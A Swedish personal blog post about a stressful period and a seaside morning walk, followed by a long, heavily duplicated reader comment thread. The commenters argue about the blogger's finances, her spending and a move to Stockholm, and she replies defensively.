Krispig morgon PW. Vacker utsikt över kalmarsund.

D0ECECDC-FD98-42DC-9E83-A1ADF1464281

Godmorgon! 

Men lång skön, tyst PW med vackra Kalmarsund som utsikt🌟🙏🏻 Min medecin mot allt! Rensar Som vanligt tankarna och boostar med energi…. Är det någotning som jag verkligen behöver just nu, så är det energi 🙏🏻

Jag är sjukt pressad från alla håll. Hjärtat blöder, ekonomin blöder, beslutsångest och  juridiska åsikter. Förutom det, ett ”vardags puzzle” och livet i största allmänhet. Studierna kräver sitt, bloggen likaså. Nånstans däremellan föröker jag att hålla mig själv ovanför vattenyta, och hålla ångesten på avstånd. 

Dubbla åsikter på sista inlägget. Vissa tror sig veta allt och lite till. Alltid ett intressant fenomen det där… det ligger så nära till hands att dömma, utan att känna till.

-Vi hörs sen!

Kram

/My Martens 

74 Komentarer

 1. Förstår dig precis. Har just nu ekonomisk kris med dubbla boendekostnader, sjukdomar som avlöser varandra, oro och ångest. Men jag är en kämpe, precis som du.
  Saknar min farmor och det blir påtagligare med dina bilder. Hon bor nämligen precis där du står… balkongen ut mot kajen.
  Kram

 2. Ditt beslut är ditt, ingen annans. Men jag skulle önska av hela mitt hjärta att du kunnat leva och försörja dig på Öland. Jag har läst din blogg i så många år och jag bryr mig så mycket om dig. Du är en så otroligt duktig kvinna. Ska du aldrig bara få vara. Inga stora bekymmer utan att allt bara flyter lugnt och lyckligt runt dig. Hoppas den dagen kommer snart mamma My. Kram ❤

 3. Förstår dig precis. Har just nu ekonomisk kris med dubbla boendekostnader, sjukdomar som avlöser varandra, oro och ångest. Men jag är en kämpe, precis som du.
  Saknar min farmor och det blir påtagligare med dina bilder. Hon bor nämligen precis där du står… balkongen ut mot kajen.
  Kram

 4. Ditt beslut är ditt, ingen annans. Men jag skulle önska av hela mitt hjärta att du kunnat leva och försörja dig på Öland. Jag har läst din blogg i så många år och jag bryr mig så mycket om dig. Du är en så otroligt duktig kvinna. Ska du aldrig bara få vara. Inga stora bekymmer utan att allt bara flyter lugnt och lyckligt runt dig. Hoppas den dagen kommer snart mamma My. Kram ❤

 5. Kära My. Jag förstår o känner av din ångest o förstår också att din situation är ohållbar. Man kan inte leva ett så delat liv i längden, varken ekonomiskt eller känslomässigt. Du kommer att gå sönder av oro o stress. Så du kanske får prova ett annat sätt att leva där du är mer fokuserad på en sak i taget o kanske kan få ett mer harmoniskt hem för dig, Ludvig o Jonas. Ingen mår bra av en utbränd mamma eller flickvän, allra minst du själv. Lycka till m dina beslut?

 6. Fina My ❣️. Eftersom jag inte vet allt det du går igenom så har jag ingen rätt att döma dina beslut på något sätt. Skulle inte göra det ändå om jag visste allt ioförsig. ? det är du som har huvudrollen i ditt eget liv och bara du som vet vad du känner om allt. Jag hoppas innerligt att allt ordnar upp sig för dig. ? du är världens bästa mamma till din lille vapendragare glöm aldrig det. Ha nu en fin helg kära du och var rädd om dig. Kram Sara ?

 7. Kul/intressant att läsa din blogg men förstår att du har många saker att hinna med. Du kanske ibland kan skriva lite minde på inläggen och det menar jag absolut bara för din skull. Trevlig helg ?

 8. Kära My. Jag förstår o känner av din ångest o förstår också att din situation är ohållbar. Man kan inte leva ett så delat liv i längden, varken ekonomiskt eller känslomässigt. Du kommer att gå sönder av oro o stress. Så du kanske får prova ett annat sätt att leva där du är mer fokuserad på en sak i taget o kanske kan få ett mer harmoniskt hem för dig, Ludvig o Jonas. Ingen mår bra av en utbränd mamma eller flickvän, allra minst du själv. Lycka till m dina beslut😊

 9. Fina My ❣️. Eftersom jag inte vet allt det du går igenom så har jag ingen rätt att döma dina beslut på något sätt. Skulle inte göra det ändå om jag visste allt ioförsig. 🤔 det är du som har huvudrollen i ditt eget liv och bara du som vet vad du känner om allt. Jag hoppas innerligt att allt ordnar upp sig för dig. 💕 du är världens bästa mamma till din lille vapendragare glöm aldrig det. Ha nu en fin helg kära du och var rädd om dig. Kram Sara 💕

 10. Kul/intressant att läsa din blogg men förstår att du har många saker att hinna med. Du kanske ibland kan skriva lite minde på inläggen och det menar jag absolut bara för din skull. Trevlig helg 😚

 11. Hej My, har läst din o Åzas bloggar länge men kommenterar sällan. Måste bara få säga att jag tycker du ska bosätta dig i Stockholm nu. Tvärt emot vad ” andra tycker”…. Det blir i det långa loppet just för Lillemans skull! Han får en mamma som kan ordna upp sitt liv och ekonomi samt få orken tillbaks, då du kan lägga all energi på honom de helger och lov han är hos dig. ? Love and light!! ✨

 12. Vacker bild! Det där rosa till vänster är framtiden….
  Sänder varma energier till Dig och jag vet som levt så länge att det kommer att ordna sig!
  När jag var i ”stormens öga” fanns inte internet och därför kunde ”trollen” inte nå mig! Du kommer att klara av allt Du vill och önskar!

 13. Hej My, har läst din o Åzas bloggar länge men kommenterar sällan. Måste bara få säga att jag tycker du ska bosätta dig i Stockholm nu. Tvärt emot vad ” andra tycker”…. Det blir i det långa loppet just för Lillemans skull! Han får en mamma som kan ordna upp sitt liv och ekonomi samt få orken tillbaks, då du kan lägga all energi på honom de helger och lov han är hos dig. 🌹 Love and light!! ✨

 14. Vacker bild! Det där rosa till vänster är framtiden….
  Sänder varma energier till Dig och jag vet som levt så länge att det kommer att ordna sig!
  När jag var i ”stormens öga” fanns inte internet och därför kunde ”trollen” inte nå mig! Du kommer att klara av allt Du vill och önskar!

 15. Du skriver och då måste du vara beredd på alla slags kommentarer,både positiva och negativa.Det jag inte förstår detta fikande och ätande ute på restauranger nästan hela tiden,det kostar pengar det! Om förhållandet är stabilt, så klarar det att man är ifrån varandra så ofta som ni måste!
  Hoppas ändå att livet ska gå bra för dig även om det går väldigt upp och ner!

  • Har många gånger tänkt samma sak, kaffe, fika och lunch på Riche är verkligen inte billigt. Det är bara du som kan bestämma över ditt liv ta beslut men det finns då många bloggare som inte bor i Stockholm så det måste väl ändå gå. Förstår att det är en spännande utbildning som så klart kräver mycket tid men går det inte att pausa den ett tag tills du har fått ro det känns bara som det är för mycket allt detta.

 16. Du skriver och då måste du vara beredd på alla slags kommentarer,både positiva och negativa.Det jag inte förstår detta fikande och ätande ute på restauranger nästan hela tiden,det kostar pengar det! Om förhållandet är stabilt, så klarar det att man är ifrån varandra så ofta som ni måste!
  Hoppas ändå att livet ska gå bra för dig även om det går väldigt upp och ner!

  • Har många gånger tänkt samma sak, kaffe, fika och lunch på Riche är verkligen inte billigt. Det är bara du som kan bestämma över ditt liv ta beslut men det finns då många bloggare som inte bor i Stockholm så det måste väl ändå gå. Förstår att det är en spännande utbildning som så klart kräver mycket tid men går det inte att pausa den ett tag tills du har fått ro det känns bara som det är för mycket allt detta.

 17. Fundera vad som är viktigast. Är det sonen. Hoppa av mäklarutbildningen just nu och jobba med samarbete som inte kräver Sthlm. Finns ju många exempel på bloggare som fixar det och åker sällan/aldrig till Sthlm. Ta ett vanligt jobb under något år. Allt har sin tid. Det som inte kan vänta och som inte kommer åter är tiden med barn. Jobben finns kvar.

 18. Du måste få må bra för att få det fungera. Då mår ochså din din son bra! Ha din bas i Stockholm o sen får han komma helger o lov. Det tar han ingen skada av o han har ju en trygg familj på Öland! Lycka till med allt. Kram

 19. Fundera vad som är viktigast. Är det sonen. Hoppa av mäklarutbildningen just nu och jobba med samarbete som inte kräver Sthlm. Finns ju många exempel på bloggare som fixar det och åker sällan/aldrig till Sthlm. Ta ett vanligt jobb under något år. Allt har sin tid. Det som inte kan vänta och som inte kommer åter är tiden med barn. Jobben finns kvar.

 20. Du måste få må bra för att få det fungera. Då mår ochså din din son bra! Ha din bas i Stockholm o sen får han komma helger o lov. Det tar han ingen skada av o han har ju en trygg familj på Öland! Lycka till med allt. Kram

 21. Att din ekonomi blöder har jag svårt att tro, med allt uteätande å fikande på dyra restauranger samt dyra långklänningar, gåhem laga maten själv och koka ditt eget kaffe , hoppa över allt uteätande så kanske din ekonomi blir stabilare, det går ju inte att leva lyxliv om man inte har ekonomi för det,du har ju en son du måste tänka på, ekonomin är nog bara en ursäkt för att kunna flytta till sthlm permanenta, men det är ju ditt liv och du gör ju som du vill

 22. Att din ekonomi blöder har jag svårt att tro, med allt uteätande å fikande på dyra restauranger samt dyra långklänningar, gåhem laga maten själv och koka ditt eget kaffe , hoppa över allt uteätande så kanske din ekonomi blir stabilare, det går ju inte att leva lyxliv om man inte har ekonomi för det,du har ju en son du måste tänka på, ekonomin är nog bara en ursäkt för att kunna flytta till sthlm permanenta, men det är ju ditt liv och du gör ju som du vill

 23. Förstår inte heller hur du kan säga att fin ekonomi blöder när du dricker utekaffe var och varenda dag äter köttbullar på Riche som säkert kostar ett par hundra bara det hänger inte ihop med mitt liv som ensamstående mamma i en Stockholmsförort. Tycker du har kämpat länge nu för att få vara med i Stockholms eliten My tror du skulle må så mycket bättre av att ge upp detta och göra något helt annat att synas är inte allt i livet. Är samarbetspartners intresserade av dig så spelar det nog ingen roll var du bor finns många välbesökta bloggare som inte bor i Stockholm. Nu vet jag att vi inte ser allt här men så många samarbetspartners är det väl heller inte. Ge dig själv och din son lugn och ro nu istället för allt detta kämpande.

  • Hahaha! Förlåt Marion… men jag kan inte annat än att skratta.. inte åt dig såklart ☺️ Utan pt det du skriver? Eliten? Köttbullar på riche? Ja, mycket ska man få höra innan öronen trillar av… ännu mer intressant är att Och du dessutom vet mer om mina samarbetspartner än jag själv, och våra kontrakt… jag skulle kunna lägga en timme på att dokumenterat, visat mina räkningar, mina lån både privat från konkursen och i bolaget från konkursen. Specat upp mina flykostnader, dubbla boende kostnader, bensinpengar, och dessutom specat upp inkomstförlusten för förlorad arbetstid. Men vad hjälper det? Jag har vänt ut och in på mig själv. För att vara alla andra till lags, jag kör, och jobbar trippelt upp mot en ”medelsvensson” för att täcka upp för allt detta… Jag gör allt jag kan och lite till, men det håller inte. Du har din åsik. Baserad på noll insikt och inte minsta belägg för det du skriver…. jag avslutar med att önska dig och Förutfattade meningar en riktigt trevlig helg! ☺️

 24. Förstår inte heller hur du kan säga att fin ekonomi blöder när du dricker utekaffe var och varenda dag äter köttbullar på Riche som säkert kostar ett par hundra bara det hänger inte ihop med mitt liv som ensamstående mamma i en Stockholmsförort. Tycker du har kämpat länge nu för att få vara med i Stockholms eliten My tror du skulle må så mycket bättre av att ge upp detta och göra något helt annat att synas är inte allt i livet. Är samarbetspartners intresserade av dig så spelar det nog ingen roll var du bor finns många välbesökta bloggare som inte bor i Stockholm. Nu vet jag att vi inte ser allt här men så många samarbetspartners är det väl heller inte. Ge dig själv och din son lugn och ro nu istället för allt detta kämpande.

  • Hahaha! Förlåt Marion… men jag kan inte annat än att skratta.. inte åt dig såklart ☺️ Utan pt det du skriver? Eliten? Köttbullar på riche? Ja, mycket ska man få höra innan öronen trillar av… ännu mer intressant är att Och du dessutom vet mer om mina samarbetspartner än jag själv, och våra kontrakt… jag skulle kunna lägga en timme på att dokumenterat, visat mina räkningar, mina lån både privat från konkursen och i bolaget från konkursen. Specat upp mina flykostnader, dubbla boende kostnader, bensinpengar, och dessutom specat upp inkomstförlusten för förlorad arbetstid. Men vad hjälper det? Jag har vänt ut och in på mig själv. För att vara alla andra till lags, jag kör, och jobbar trippelt upp mot en ”medelsvensson” för att täcka upp för allt detta… Jag gör allt jag kan och lite till, men det håller inte. Du har din åsik. Baserad på noll insikt och inte minsta belägg för det du skriver…. jag avslutar med att önska dig och Förutfattade meningar en riktigt trevlig helg! ☺️

 25. Men nåt jobb i stockholm förutom bloggen verkar du ju inte ha, samarbeten kan du ju fixa via mejl el. Mobilen Ilmrud Toftby m.m är ju inte stationerade i sthlm men har framgångsrika bloggar

  • Jag jämförs gärna inte med varken Madde eller johanna. För det enda vi har gemensamt är just att vi bloggar! Värre falskhet, ”vända kappan efter vinden” och skitsnackare får du leta efter.En åsikt jag öppet står för och som jag sedan några år vuxit ifrån och inte vill beblanda mig med =) och då kära Ninni…. så har jag starka belägg för det jag skriver, och det har jag fått lära mig den hårda vägen.
   Mina övriga jobb i sthlm, ja vi spelar i podd i just sthlm 1-2 gånger veckan. Nästan 1 dag i veckan går till plåtning, just i sthlm. 1-2 dagar veckan till utbildningen och EO. Sen ligger möten på resten… Nu inför kommande kampanjer så kommer jag fysiskt jobba med mina partner på plats i sthlm . Sen finns det ju x-antal projekt till. Förutom det så hade jag nog behövt några dagar till på mina veckor. Skulle du vilja följa med mig en vecka i mitt liv, bara för att förstå? Det kanske kunde vara bra för alla som läser in blogg =) jag är inte särkilt farlig, och jag tror att du hade haft ganska kul =)
   Kanske i slutända skulle du krama om mig, säga förlåt… shit vilken kämpe du är! –
   Hojta till så sätter vi igång!
   Eller vad var det du tänkte på? Tror du att jag sitter och pillar navelludd och ”bara” bloggar lite! Tror du att det finansierar 2 bostäder? 4-5 flygbiljetter för lilleman, lån för konkursen på ca 10k extra varje månad.. och sen tar vi alla ”Vanliga utgifter” på det. ja… men det räcker nog att slå upp bloggen ifrån öland… så trillar pengarna in. haha!
   Ärligt talat. Nu får du ett ganska irriterat svar. Men det är för att du med flera har så otroligt mycket förutfattade meningar kring en branch som du uppenbarligen inte känner till…. Hoppas att jag gjord mig åtminstone lite förstådd även om jag förstår att du inte kan sätta mig in i min situation =) Jag hoppas innerligt att du aldrig hamnar i den situation som jag hamnat i, det önskar jag inte någon! Men en sak vet jag då säkert… Ge mig några år. så har jag tryggat både min och Lillemans framtid! =)

    • Jag kastar ingen skit… googla och se istället vad dom skriver om mig, öppet på deras egna sidor. 40 plus och mammor ? (förutom Madde som inte är 40+ än) jag skriver att dom är skitsnackare och ”vända kappan efter vinden” personer. Det står jag för. Här, inför dom och inför vem som… som frågar. Just pga av det du får fram när du googlar…… Men därifrån till attbörja kasta skit, eller berätta det jag vet om alla inblandad… nej, vet du. Det står jag över ?

     • My jag har följt deras bloggar och inte sett att de skriver om dig, utan de skriver om sin vardag. Du kanske ska länka till detta du påstår om dessa två fina bloggare.
      Varför tar du inte med dig hemmagjord lunch det blir billigare i längden och låt bli att fika ute för det blir dyrt i längden. Tänkte också på väskorna samt alla kläder osv du köper, varför måste det vara så dyrt. Passar det inte att köpa på vanliga affärer. Det du visar upp på bloggen har ju ingen vanlig svennson råd att köpa.
      Vilken målgrupp vänder du dig till med all din reklam?

     • Du får googla själv istället, så förstår du snart varjag menar…. ? väskorna jag köper? Det stod tydligt i det inlägget ”i samarbete med”. Så kära Ann, låt mig och min ekonomi vara…. jag är gör allt som står i min makt för att vända min ekonomi sedan konkurs. I dom förta samarbeten så ingår det produkter plus att jag fakturerar för ett samarbete. Förr annonserade man i tidningar, nu väljer man profiler, sighter som är skräddarsytt efter ”rätt” målgrupp… så om du läser min tidigare kommentar så förklarar jag ännu lite utförligare där ?
      Bla, att jag sagt upp min kontorsplats, för att dra ner på kostnaderna. Vilket då självklart drar med sig fler utgifter när man då utgår ifrån olika offentliga platser. Men oj vadoengar jag trots kaffe och luncher sparar på det… min målgrupp har jag koll på ? och den för vi statestik på. Men den frågan väljer jag att artigt men bestämt tacka nej till att svara på… ? ha en fina dag! Ann..

     • Snälla My det är ju du själv som skriver om din ekonomi och hur dåligt du mår hela tiden. Det är inte vi som drar upp det utan det är ju du själv eller hur? Vi vill bara hjälpa dig genom att ge tips på hur du kan spara för att minska utgifterna. Dessa sidor du gör reklam för är ju alltid så dyra varför? När det gäller Madde och Johanna, så verkar de visa upp två vardagliga bloggar. Inte än massa upprepningar hela tiden.
      ”Jag har tidigare skrivit att jag inte klarar av att ta så mycket som ett beslut till, då sista åren har varit extremt påfrestande med flytt, dubbla bostäder, dubbla utgifter, flybiljetter, konkursen, större utgifter. Dubbel jobb bara för att överhuvudtaget går runt.”

   • Eftersom jag själv inte har läst något elakt om dig från varken Madde eller Johanna och eftersom du inte vill länka till detta så tror jag inte att det har varit något elakt från deras sida. Däremot så tycker jag att det är konstigt att du skriver som du göra angående dessa här i dina kommentarer då du själv är emot nätmobbning. De verkar ha det ordnat för sig och leva ett gott liv så vad är det för fel med det?

 26. Men nåt jobb i stockholm förutom bloggen verkar du ju inte ha, samarbeten kan du ju fixa via mejl el. Mobilen Ilmrud Toftby m.m är ju inte stationerade i sthlm men har framgångsrika bloggar

  • Jag jämförs gärna inte med varken Madde eller johanna. För det enda vi har gemensamt är just att vi bloggar! Värre falskhet, ”vända kappan efter vinden” och skitsnackare får du leta efter.En åsikt jag öppet står för och som jag sedan några år vuxit ifrån och inte vill beblanda mig med =) och då kära Ninni…. så har jag starka belägg för det jag skriver, och det har jag fått lära mig den hårda vägen.

   Mina övriga jobb i sthlm, ja vi spelar i podd i just sthlm 1-2 gånger veckan. Nästan 1 dag i veckan går till plåtning, just i sthlm. 1-2 dagar veckan till utbildningen och EO. Sen ligger möten på resten… Nu inför kommande kampanjer så kommer jag fysiskt jobba med mina partner på plats i sthlm . Sen finns det ju x-antal projekt till. Förutom det så hade jag nog behövt några dagar till på mina veckor. Skulle du vilja följa med mig en vecka i mitt liv, bara för att förstå? Det kanske kunde vara bra för alla som läser in blogg =) jag är inte särkilt farlig, och jag tror att du hade haft ganska kul =)

   Kanske i slutända skulle du krama om mig, säga förlåt… shit vilken kämpe du är! –

   Hojta till så sätter vi igång!

   Eller vad var det du tänkte på? Tror du att jag sitter och pillar navelludd och ”bara” bloggar lite! Tror du att det finansierar 2 bostäder? 4-5 flygbiljetter för lilleman, lån för konkursen på ca 10k extra varje månad.. och sen tar vi alla ”Vanliga utgifter” på det. ja… men det räcker nog att slå upp bloggen ifrån öland… så trillar pengarna in. haha!

   Ärligt talat. Nu får du ett ganska irriterat svar. Men det är för att du med flera har så otroligt mycket förutfattade meningar kring en branch som du uppenbarligen inte känner till…. Hoppas att jag gjord mig åtminstone lite förstådd även om jag förstår att du inte kan sätta mig in i min situation =) Jag hoppas innerligt att du aldrig hamnar i den situation som jag hamnat i, det önskar jag inte någon! Men en sak vet jag då säkert… Ge mig några år. så har jag tryggat både min och Lillemans framtid! =)

    • Jag kastar ingen skit… googla och se istället vad dom skriver om mig, öppet på deras egna sidor. 40 plus och mammor 🙈 (förutom Madde som inte är 40+ än) jag skriver att dom är skitsnackare och ”vända kappan efter vinden” personer. Det står jag för. Här, inför dom och inför vem som… som frågar. Just pga av det du får fram när du googlar…… Men därifrån till attbörja kasta skit, eller berätta det jag vet om alla inblandad… nej, vet du. Det står jag över 😂

     • My jag har följt deras bloggar och inte sett att de skriver om dig, utan de skriver om sin vardag. Du kanske ska länka till detta du påstår om dessa två fina bloggare.
      Varför tar du inte med dig hemmagjord lunch det blir billigare i längden och låt bli att fika ute för det blir dyrt i längden. Tänkte också på väskorna samt alla kläder osv du köper, varför måste det vara så dyrt. Passar det inte att köpa på vanliga affärer. Det du visar upp på bloggen har ju ingen vanlig svennson råd att köpa.
      Vilken målgrupp vänder du dig till med all din reklam?

     • Du får googla själv istället, så förstår du snart varjag menar…. 🙂 väskorna jag köper? Det stod tydligt i det inlägget ”i samarbete med”. Så kära Ann, låt mig och min ekonomi vara…. jag är gör allt som står i min makt för att vända min ekonomi sedan konkurs. I dom förta samarbeten så ingår det produkter plus att jag fakturerar för ett samarbete. Förr annonserade man i tidningar, nu väljer man profiler, sighter som är skräddarsytt efter ”rätt” målgrupp… så om du läser min tidigare kommentar så förklarar jag ännu lite utförligare där 🙂

      Bla, att jag sagt upp min kontorsplats, för att dra ner på kostnaderna. Vilket då självklart drar med sig fler utgifter när man då utgår ifrån olika offentliga platser. Men oj vadoengar jag trots kaffe och luncher sparar på det… min målgrupp har jag koll på 🙂 och den för vi statestik på. Men den frågan väljer jag att artigt men bestämt tacka nej till att svara på… 🙂 ha en fina dag! Ann..

     • Snälla My det är ju du själv som skriver om din ekonomi och hur dåligt du mår hela tiden. Det är inte vi som drar upp det utan det är ju du själv eller hur? Vi vill bara hjälpa dig genom att ge tips på hur du kan spara för att minska utgifterna. Dessa sidor du gör reklam för är ju alltid så dyra varför? När det gäller Madde och Johanna, så verkar de visa upp två vardagliga bloggar. Inte än massa upprepningar hela tiden.

      ”Jag har tidigare skrivit att jag inte klarar av att ta så mycket som ett beslut till, då sista åren har varit extremt påfrestande med flytt, dubbla bostäder, dubbla utgifter, flybiljetter, konkursen, större utgifter. Dubbel jobb bara för att överhuvudtaget går runt.”

   • Eftersom jag själv inte har läst något elakt om dig från varken Madde eller Johanna och eftersom du inte vill länka till detta så tror jag inte att det har varit något elakt från deras sida. Däremot så tycker jag att det är konstigt att du skriver som du göra angående dessa här i dina kommentarer då du själv är emot nätmobbning. De verkar ha det ordnat för sig och leva ett gott liv så vad är det för fel med det?

 27. Men snälla My kan du inte bara förklara hur du har råd att äta köttbullar på Riche till lunch INTE billigt fika kaffe och fantastiska klänningar om din ekonomi blöder får inte ihop den ekvationen. Finns ju många billigare alternativ som man väl är tvungen att ta om man vill komma på fötter igen. Jag ber inte dig om att visa dina konton avtal eller annat kan faktiskt inte se att någon annan har gjort det heller du.

  • Men Linnea 87. Jag misstänker att du precis som jag alltså är 30 år gammal. Ska jag förklara för dig hur jag har råd att äta köttbullar på Riche? Vad skulle det ha med mina 13-17 tusen EXTRA utgift varje månad tack vare pendlingen att göra. Jo kära Linnea, jag sa upp mitt tidigare kontor som jag hade, för att dra ner på kostnaderna. Det kostade mig ca 6000:- plus moms varje månad. plus försäkring och lite hushålls el. Just för att hålla igen. Det drar då med sig att jag sitter och jobbar på olika offentliga platser. Då får jag automatisk extra utgifter på både kaffe och lunch emellanåt. Många av mötena man har, eller dom jobb jag gör när jag är ”ute” då bjuder eller står företagen på lunch, fika osv. Men i vissa fall är det jag som bjuder eller står för det själv. det beror helt på upplägget av möte/samarbete. Jag jobbar ju även som frilands. För att överleva och går runt med alla som utgifter som jag har. Då måste jag omsätta minst 100K/månaden. Plus moms. Dessa köttbullar på Riche kostade mig ca 200Kr men resulterade i ett eventuellt nytt samarbete… och en affär som jag ”stängde” och kommer kunna fakturera ca 25000:- plus moms under q2 2018. Men hur i jössenamn kan du och flera därtill ifrågasätta just detta? Ska jag verkligen behöva förklara det. Om man som jag gått igenom en konkurs, skyddat både anställda och leverantörer. Gjort rätt för mig. Vänt ut och in på mig själv. Sålt bilar, handväskor, smycken. Jag har senaste året lyckats parera jobb, utbildning och ny anställning hos EO när jag är klar. Jag har alltså hittills överlevt och tryggat upp min och Ludvigs framtid rent ekonomiskt. jag vet, att jag har va 2 år kvar som är riktigt tuffa… men sen vänder det! Ska jag verkligen behöva förklara allt detta och lite till…. Kan man inte bara låta mig äta mina köttbullar på ett lunchmöte med gott samvete utan att behöva granskas, ifrågasättas och förklara det? Jösses! Kläder köper jag ytterst sällan till mig själv. Jag är sponsrad till 80% och väldigt stolt och tacksam för det. Det har tagit mig år att komma hit där jag är idag, Bloggen drivs i ett AB. Jag frilansar för hälsomagasin, gör träningsresor, roddar, bloggar, kosnultar och jobbar arslet av mig för varande krona!
   Tack vara detta så kommer jag att kunna bli skuldfri, komma tillbaka ekonomiskt efter konkurs och annat… Bara jag håller ut och fortsätter kämpa! Och det kära linnea, det kommer jag att fortsätta göra! Så snälla rara söta Linnea… Kan du inte bara förklara hur dessa frågor kring mina köttbullar kan kännas relevanta i din värld? jag är uppriktigt sagt väldigt nyfiken. Ps sist jag var på just Riche, det var ca 1 år sedan…. Konstigt egentligen för det är ett av mina favvo ställen, kanske är det för att Jonas inte gillar det. Eller för att det helt enkelt bara inte blivit så på ett tag…
   Är det kanske just Riche som känns lite exotiskt och retar mina läsare? Riche är inte ett dugg exotisk eller särskilt speciellt. MEN har väldigt goda kötbullar! ?

    • Lunchen var ensam, ett möte innan, och ett möte efter ? Jag visar ju inte alla människor som jag jobbarf/har möten med.. Så, jag.. jag smaskade i mig köttbullarna alldeles ensam =)

     • Oh herregud….vad är detta för nivå när folk kräver redogörelse för att du ätit köttbullar!! Hoppas dom va goda, tycker du ska göra det snart igen, hehe bara för att reta kärringarna lite ??

 28. Men snälla My kan du inte bara förklara hur du har råd att äta köttbullar på Riche till lunch INTE billigt fika kaffe och fantastiska klänningar om din ekonomi blöder får inte ihop den ekvationen. Finns ju många billigare alternativ som man väl är tvungen att ta om man vill komma på fötter igen. Jag ber inte dig om att visa dina konton avtal eller annat kan faktiskt inte se att någon annan har gjort det heller du.

  • Men Linnea 87. Jag misstänker att du precis som jag alltså är 30 år gammal. Ska jag förklara för dig hur jag har råd att äta köttbullar på Riche? Vad skulle det ha med mina 13-17 tusen EXTRA utgift varje månad tack vare pendlingen att göra. Jo kära Linnea, jag sa upp mitt tidigare kontor som jag hade, för att dra ner på kostnaderna. Det kostade mig ca 6000:- plus moms varje månad. plus försäkring och lite hushålls el. Just för att hålla igen. Det drar då med sig att jag sitter och jobbar på olika offentliga platser. Då får jag automatisk extra utgifter på både kaffe och lunch emellanåt. Många av mötena man har, eller dom jobb jag gör när jag är ”ute” då bjuder eller står företagen på lunch, fika osv. Men i vissa fall är det jag som bjuder eller står för det själv. det beror helt på upplägget av möte/samarbete. Jag jobbar ju även som frilands. För att överleva och går runt med alla som utgifter som jag har. Då måste jag omsätta minst 100K/månaden. Plus moms. Dessa köttbullar på Riche kostade mig ca 200Kr men resulterade i ett eventuellt nytt samarbete… och en affär som jag ”stängde” och kommer kunna fakturera ca 25000:- plus moms under q2 2018. Men hur i jössenamn kan du och flera därtill ifrågasätta just detta? Ska jag verkligen behöva förklara det. Om man som jag gått igenom en konkurs, skyddat både anställda och leverantörer. Gjort rätt för mig. Vänt ut och in på mig själv. Sålt bilar, handväskor, smycken. Jag har senaste året lyckats parera jobb, utbildning och ny anställning hos EO när jag är klar. Jag har alltså hittills överlevt och tryggat upp min och Ludvigs framtid rent ekonomiskt. jag vet, att jag har va 2 år kvar som är riktigt tuffa… men sen vänder det! Ska jag verkligen behöva förklara allt detta och lite till…. Kan man inte bara låta mig äta mina köttbullar på ett lunchmöte med gott samvete utan att behöva granskas, ifrågasättas och förklara det? Jösses! Kläder köper jag ytterst sällan till mig själv. Jag är sponsrad till 80% och väldigt stolt och tacksam för det. Det har tagit mig år att komma hit där jag är idag, Bloggen drivs i ett AB. Jag frilansar för hälsomagasin, gör träningsresor, roddar, bloggar, kosnultar och jobbar arslet av mig för varande krona!

   Tack vara detta så kommer jag att kunna bli skuldfri, komma tillbaka ekonomiskt efter konkurs och annat… Bara jag håller ut och fortsätter kämpa! Och det kära linnea, det kommer jag att fortsätta göra! Så snälla rara söta Linnea… Kan du inte bara förklara hur dessa frågor kring mina köttbullar kan kännas relevanta i din värld? jag är uppriktigt sagt väldigt nyfiken. Ps sist jag var på just Riche, det var ca 1 år sedan…. Konstigt egentligen för det är ett av mina favvo ställen, kanske är det för att Jonas inte gillar det. Eller för att det helt enkelt bara inte blivit så på ett tag…

   Är det kanske just Riche som känns lite exotiskt och retar mina läsare? Riche är inte ett dugg exotisk eller särskilt speciellt. MEN har väldigt goda kötbullar! 😉

    • Lunchen var ensam, ett möte innan, och ett möte efter 😉 Jag visar ju inte alla människor som jag jobbarf/har möten med.. Så, jag.. jag smaskade i mig köttbullarna alldeles ensam =)

     • Oh herregud….vad är detta för nivå när folk kräver redogörelse för att du ätit köttbullar!! Hoppas dom va goda, tycker du ska göra det snart igen, hehe bara för att reta kärringarna lite 😂😂

 29. Det är väl ingen som kräver nån redogörelse från my, men hennes bloggande går liksom inte ihop med vad hon visar upp kvitto på dyr klänning bilder från lunch på rich fika m.m utemat på utemat sen dagarna efter gråter hon att ekonomin blöder! Kanske dax att anmäla sig till lyxfällan, finns ju fler ensam mamma söker som varit där när de velat vara i rampljuset men inte lyckats bli kändisar utan snarare bankrutt

 30. Det är väl ingen som kräver nån redogörelse från my, men hennes bloggande går liksom inte ihop med vad hon visar upp kvitto på dyr klänning bilder från lunch på rich fika m.m utemat på utemat sen dagarna efter gråter hon att ekonomin blöder! Kanske dax att anmäla sig till lyxfällan, finns ju fler ensam mamma söker som varit där när de velat vara i rampljuset men inte lyckats bli kändisar utan snarare bankrutt

 31. Du har ABSOLUT ingen skyldighet alls att förklara för läsarna hur din ekonomi ser ut.
  Typ hur du kan ha råd att äta köttbullar eller fika ute …. horribelt hur en del håller på och tycker än hit och dit.
  Skit på er alla gnällspikar och DU My det är helt din egen ensak att välja det som passar dig bäst.
  Sluta upp att redogöra för dina val utan tänk istället så här att bara för att man bloggar har ingen annan rättighet att hacka och slå ner på en bara för att de själva skulle gjort annorlunda väl för det är väl det de vill få fram.
  Man väljer själv och gör som man själv vill.

 32. Du har ABSOLUT ingen skyldighet alls att förklara för läsarna hur din ekonomi ser ut.
  Typ hur du kan ha råd att äta köttbullar eller fika ute …. horribelt hur en del håller på och tycker än hit och dit.

  Skit på er alla gnällspikar och DU My det är helt din egen ensak att välja det som passar dig bäst.
  Sluta upp att redogöra för dina val utan tänk istället så här att bara för att man bloggar har ingen annan rättighet att hacka och slå ner på en bara för att de själva skulle gjort annorlunda väl för det är väl det de vill få fram.
  Man väljer själv och gör som man själv vill.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

